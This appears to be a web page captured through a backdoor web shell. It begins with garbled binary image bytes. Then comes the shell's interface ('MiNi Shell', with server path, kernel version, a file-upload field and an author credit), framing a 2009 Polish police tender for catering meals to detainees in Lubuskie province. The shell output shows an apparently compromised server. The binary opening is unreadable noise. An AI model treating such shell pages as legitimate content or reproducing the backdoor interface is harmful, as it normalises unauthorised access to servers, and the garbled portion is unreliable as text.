JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090917/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090917/158199-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie usługi polegającej na przygotowaniu i dowozie posiłków całodziennych dla osób zatrzymanych przez jednostki policji woj. lubuskiego.</b><br>
<b>Numer ogłoszenia: 158199 - 2009; data zamieszczenia: 17.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7211420, faks 095 7211455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.policja.gorzow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: POLICJA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi polegającej na przygotowaniu i dowozie posiłków całodziennych dla osób zatrzymanych przez jednostki policji woj. lubuskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: świadczenie usługi polegającej na przygotowaniu i dowozie posiłków całodziennych dla osób zatrzymanych przez jednostki policji woj. lubuskiego.                
2.	Dzienna stawka żywieniowa (tzw. wsad do kotła), określona w oparciu o obowiązujące w Resorcie Spraw Wewnętrznych i Administracji przepisy, aktualnie wynosi:
-	9,75 zł dla osób poniżej 18 roku życia i kobiet w ciąży, +  wynikająca z oferty wysokość marży (maksymalnie do 100 % dziennej stawki żywieniowej) 
+ obowiązująca stawka podatku VAT;
-	7,80 zł. dla osób dorosłych + wynikająca z oferty wysokość marży (maksymalnie do 100 % dziennej stawki żywieniowej) + obowiązująca stawka podatku VAT ;
-	13,96 zł osobom poniżej 18 roku życia w dniach świątecznych, ustawowo wolnych od pracy oraz w dniu 1 czerwca (Dzień Dziecka) + wynikająca z oferty wysokość marży (maksymalnie do 100 % dziennej stawki żywieniowej) + obowiązująca stawka podatku VAT.
3.	Przy przygotowaniu suchego prowiantu na czas konwoju trwającego powyżej 6 godzin wysokość powyższych norm wzrasta o 50%.
4.	Całodzienna stawka obejmuje (100% kwoty), w poszczególnym rozbiciu:
1)	25% - śniadanie,
2)	50 % - obiad,
3)	25% - kolacja;
5.	Ilość poszczególnych posiłków (śniadania, obiady, kolacje) będzie uzależniona od ilości zatrzymanych w danej porze dnia.
6.	Dowóz posiłków odbywać się będzie w godzinach 7.00 - 19.00 przez siedem dni
w tygodniu oraz w dni ustawowo wolne od pracy i święta;
1)	śniadania w godz. 7.00 - 8.00;
2)	obiady w godz. 12.00 - 14.00;
3)	kolacje w godz. 18.00 - 19.00;
7.	Policjanci pełniący służbę w Pomieszczeniach Dla Osób Zatrzymanych i Policyjnych Izb Dziecka pół godziny przed porami żywienia będą telefonicznie informować o ilości niezbędnych posiłków.
8.	Posiłki winny być dostarczone w naczyniach jednorazowych posiadających atest PZH, odpowiednio poporcjowane i gotowe do wydania.
9.	Dowożone posiłki muszą być urozmaicone, o odpowiedniej wartości energetycznej nie mniej niż; 
1)	3.200 kalorii dla osób poniżej 18 roku życia i kobiet w ciąży,
2)	2.600 kalorii dla osób dorosłych 
i zawierać co najmniej jeden posiłek gorący oraz odpowiadać cenie przedstawionej 
w składanej przez Wykonawcę ofercie.
10.	Posiłki dla zatrzymanych objęte są 7% VAT. W przypadku gdy Wykonawca nie jest płatnikiem VAT należy zamieścić do oferty odpowiednie oświadczenie o tym, że Wykonawca nie jest płatnikiem podatku VAT.
11.	Zamawiający zastrzega możliwość zmiany stawki podstawowej w oparciu o obowiązujące 
w Resorcie Spraw Wewnętrznych i Administracji przepisy dot. zmiany wysokości stawek żywieniowych. 
12.	Zamawiający każdorazowo o zmianie dziennej stawki żywieniowej powiadomi Wykonawcę. Zmiana stawki żywieniowej będzie podstawą do zmiany treści umowy i może być dokonana wyłącznie w formie aneksu do umowy.
13.	Termin płatności wynosi 30 dni od daty wpływu faktury do Zamawiającego. Faktury winny być wystawione na Komendę Wojewódzką Policji w Gorzowie Wlkp., a przesłane do danej Komendy Miejskiej/Powiatowej celem potwierdzenia wykonania usługi. Wykonawca zobowiązany będzie do wystawienia i wysłania faktury do odpowiedniej Komendy w ciągu 7 dni po zakończeniu miesiąca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
2)	Z postępowania o udzielenie zamówienia wyklucza się Wykonawców zgodnie z wymaganiami  art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.
3)	Na potwierdzenie spełnienia warunków udziału w postępowaniu Wykonawcy muszą przedstawić dokumenty określone w punkcie -Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	NA POTWIERDZENIE WARUNKÓW UDZIAŁU W POSTĘPOWANIU WYKONAWCA ZOBOWIĄZANY JEST ZŁOŻYĆ:
a)	oświadczenie, że Wykonawca spełnia warunki art. 22 ust. 1 ustawy i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy (wzór - załącznik nr 2 do SIWZ).W przypadku Wykonawców występujących wspólnie ww dokument składa każdy z Wykonawców.
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do rejestru działalności gospodarczej, potwierdzające, że przedmiot działania wykonawcy, obejmuje zakres niezbędny do wykonania zamówienia. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku Wykonawców występujących wspólnie, ww dokumenty składa każdy z Wykonawców;
c)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów  o których mowa w pkt 1 lit. b, musi załączyć do oferty dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, (Rozporządzenie Prezesa Rady Ministrów z dn. 19.05.2006r.)
2.	NA POTWIERDZENIE SPEŁNIANIA PRZEZ OFEROWANE USŁUGI WYMAGAŃ OKREŚLONYCH PRZEZ ZAMAWIAJĄCEGO W SIWZ WYKONAWCA MUSI ZAŁĄCZYĆ DO OFERTY:
a)	oświadczenie, że Wykonawca posiada dokumenty potwierdzające spełnianie wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami żywnościowymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów - zgodnie z Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. Nr 171 poz. 1225) (wzór załącznik nr 5 do SIWZ). W przypadku Wykonawców występujących wspólnie, wyżej wymieniony dokument składa każdy z Wykonawców.
3.	INFORMACJA O  ZAWARTOŚCI OFERTY WYKONAWCY,
Wykonawca musi załączyć do oferty:
a)	prawidłowo wypełniony i podpisany formularz ofertowy (wzór - załącznik nr 1 do SIWZ).Wykonawca wypełnia tylko te tabele  formularza, które dotyczą jego oferty. Tabele  w częściach, na które Wykonawca nie składa oferty  zaleca się przekreślić.W przypadku gdy Wykonawca nie jest płatnikiem VAT należy zamieścić do oferty oświadczenie o tym, że nie jest płatnikiem podatku VAT.
b)	upoważnienie lub pełnomocnictwo (w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez notariusza -wyrok SO w Warszawie - SYGN. AKT V CA 85-07), określające zakres czynności do których jest umocowany;
c)	oświadczenie o podwykonawcach, jeżeli Wykonawca przewiduje ich udział w realizacji zadania (wzór - załącznik nr 4 do SIWZ);
d)	projekt umowy, który musi być podpisany lub zaparafowany przez Wykonawcę, natomiast zalecane jest wypełnienie części dotyczącej Wykonawcy - wzór stanowi załącznik nr 3 do SIWZ;
e)	oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę, ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego (wyznaczenie lidera). W przypadku Wykonawców występujących wspólnie zastosowanie maja przepisy ustawy zawarte w art. 23 ust. 1-4 ustawy. 
f)	W przypadku złożenia oferty przez spółkę cywilną należy załączyć oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę.
4.	Wszystkie wymagane dokumenty muszą być dostarczone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Jeżeli złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości Zamawiający może żądać przedstawienia oryginału lub kopii notarialnie poświadczonej
5.	Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę jego podpisem.
6.	Brak  wymaganych w pkt 1 dokumentów lub złożenie ich w niewłaściwej formie (np. niepoświadczenie za zgodność z oryginałem odpisu lub kopii) spowoduje wykluczenie Wykonawcy z postępowania o udzielenie zamówienia. (zgodnie z art.24 ust 2 pkt 3 ustawy - po wyczerpaniu możliwości uzupełnienia dok. lub wyjaśnienia treści dok. na podst. art. 26 ust. 3 i 4 ustawy P.z.p.)
7.	Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą zgodnie z art. 24 ust. 4 ustawy P.z.p.
8.	Brak wymaganych w pkt 2 i  3 lit. b)  dokumentów lub złożenie ich w niewłaściwej formie  (np. niepoświadczenie za zgodność z oryginałem- odpisu lub kopii) spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy) po wyczerpaniu  przez Zamawiającego możliwości wynikających  z art. 26 ust. 3 i 4,  ustawy P.z.p.
9.Brak wymaganych w pkt 3 lit. a;c;d;e;f;  dokumentów lub złożenie ich w niewłaściwej formie  (np. niepoświadczenie za zgodność z oryginałem- odpisu lub kopii) spowoduje odrzucenie oferty Wykonawcy (zgodnie z art. 89 ustawy) po wyczerpaniu  przez Zamawiającego możliwości wynikających  z art. 87 ust. 1 i 2,  ustawy P.z.p.	
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
10.	Wszystkie miejsca, w których Wykonawca naniósł zmiany muszą być parafowane przez osobę podpisującą ofertę.
11.	Jeżeli oferta Wykonawców występujących wspólnie (konsorcjum-Spółka Cywilna) zostanie wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, w przypadku Przedsiębiorców prowadzących działalność w formie Spółki Cywilnej  umowę Spółki.
12.	Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art.24 ust.2 pkt.2 Ustawy P.z.p. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji
w Gorzowie Wlkp.
Sekcja ds. Zamówień Publicznych
ul. Kwiatowa 10
66-400 Gorzów Wlkp..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 11:00, miejsce: Komenda Wojewódzka Policji
w Gorzowie Wlkp.
Sekcja ds. Zamówień Publicznych
ul. Kwiatowa 10
66-400 Gorzów Wlkp..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający dopuszcza możliwość składania ofert częściowych, w zależności od miejsca realizacji przedmiotu zamówienia 
2.	Przedmiot zamówienia podzielono na 14 części:  
CZĘŚĆ I		KMP Gorzów Wlkp. 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Wyszyńskiego 122, Gorzów Wlkp. 
-	Policyjna Izba Dziecka ul. Wyszyńskiego 122, Gorzów Wlkp.
CZĘŚĆ II		KP Kostrzyn .
-	Pomieszczenie dla Osób Zatrzymanych  ul. Jana Pawła II 64 Kostrzyn n/O
CZĘŚĆ III		KMP Zielona Góra 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Partyzantów 40, Zielona Góra, 
-	Policyjna Izba Dziecka ul. Partyzantów 40, Zielona Góra,
CZĘŚĆ IV 		KPP Międzyrzecz 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Świerczewskiego 42 Międzyrzecz,
CZĘŚĆ V 		KPP Słubice 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Kazimierza Wielkiego 1 Słubice,
CZĘŚĆ VI		KPP Wschowa 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Kazimierza Wielkiego 12 Wschowa,
CZĘŚĆ VII		KP Gubin. 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Różana 1A Gubin,
CZĘŚĆ VIII		KPP Świebodzin 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Zielona 2, świebodzin,
CZĘŚĆ IX		KPP Żary 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Legionistów 3 Żary, 
CZĘŚĆ X		KP Lubsko
-	Pomieszczenie dla Osób Zatrzymanych  ul. Wojska Polskiego 3 Lubsko,
CZĘŚĆ XI		KPP Nowa Sól 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Piłsudskiego 26 Nowa Sól,
CZĘŚĆ XII		KPP Sulęcin 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Szpitalna 1 Sulęcin,
CZĘŚĆ XIII		KPP Żagań 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Nowogródzka 1 Żagań
CZĘŚC XIV		KPP Strzelce Kraj. 
-	Pomieszczenie dla Osób Zatrzymanych  ul. Brzozowa 1 Strzelce Kraj.
Umowy będą obowiązywać na każdą część oddzielnie od dnia 21.11.2009r. do 20.11.2011r.
Sposób przekazywania inforamcji:
a) Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art.9 ust.1 ustawy P.z.p.) w języku polskim. 
b) Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować do Sekcji ds. Zamówień Publicznych na fax nr 095/7211435 lub e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub na adres: Komenda Wojewódzka Policji Sekcja ds. Zamówień Publicznych ul. Kwiatowa 10;  66-400 Gorzów Wlkp.
kryterium oceny ofert:
Cena jednego posiłku brutto (Wartość dziennej stawki żywieniowej  brutto = stawka podstawowa + zaoferowana marża i podatek vat) - znaczenie  100%,

Creat By MiNi SheLL
Email: jattceo@gmail.com